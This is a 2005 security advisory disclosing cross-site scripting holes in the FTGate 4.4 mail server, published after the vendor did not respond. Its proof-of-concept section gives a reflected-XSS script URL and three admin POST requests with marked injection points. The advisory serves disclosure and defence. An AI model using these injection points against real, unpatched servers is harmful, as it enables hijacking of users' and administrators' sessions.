<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-25-0x3] FTGate 4.4 [Build 4.4.000 Oct 26 2005] Cross Site Scripting Vulnerability</TITLE>
</HEAD>
<BODY>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - XSS Scripting Vulnerability</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-25 - 0x3</FONT>
</P>
<P><FONT SIZE=2>Class: Cross-Site-Scripting (XSS) </FONT>
<BR><FONT SIZE=2>Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005] </FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 20, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: Low</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton <security-advisories@acs-inc.com></FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>FTGate4 is a powerful Windows(TM) communication suite that combines </FONT>
<BR><FONT SIZE=2>exceptional mail handling facilities with comprehensive Groupware </FONT>
<BR><FONT SIZE=2>functionality. Its security and collaboration features were developed </FONT>
<BR><FONT SIZE=2>in conjunction with leading ISP's and define a new era in mail server </FONT>
<BR><FONT SIZE=2>performance.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially </FONT>
<BR><FONT SIZE=2>crafted XSS requests. A remote attacker could trick a user into </FONT>
<BR><FONT SIZE=2>viewing a vulnerable page which could then lead to remote compromise.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Proof of Concepts</FONT>
</P>
<P><FONT SIZE=2><A HREF="http://127.0.0.1:8089/index.fts?href=" TARGET="_blank">http://127.0.0.1:8089/index.fts?href=</A>"><script>alert('XSS-magic-string');</script></FONT>
</P>
<P><FONT SIZE=2>POST /domains/index.fts </FONT>
<BR><FONT SIZE=2>href=%2Fdomains%2Findex.fts&config=1003&command=0&start=0&param1=Domain+List%2C%2Fdomains%2Findex.fts[STRING INJECTION HERE]&param2=&find=*&elements=10&aliases=1&data0=19</FONT></P>
<P><FONT SIZE=2>POST /config/licence.fts href=%2Fconfig%2Flicence.fts&config=1003&command=0&param1=Routing%2C%2Ffilters%2Froutes.fts[STRING INJECTION HERE]&param2=&reg=</FONT></P>
<P><FONT SIZE=2>POST /config/systemacl.fts href=%2Fconfig%2Fsystemacl.fts&config=1003&command=0&id=0&param1=System+Timers%2C%2Fschedules%2Findex.fts[STRING INJECTION HERE]&redirect=&data1=32&address=</FONT></P>
<P><FONT SIZE=2>-=[ Solution</FONT>
<BR><FONT SIZE=2>No remedy available as of December 2005.</FONT>
</P>
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerability originally reported by Tim Shelton</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-25 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-20 : No response from vendor, disclosing full information.</FONT>
</P>
</BODY>
</HTML>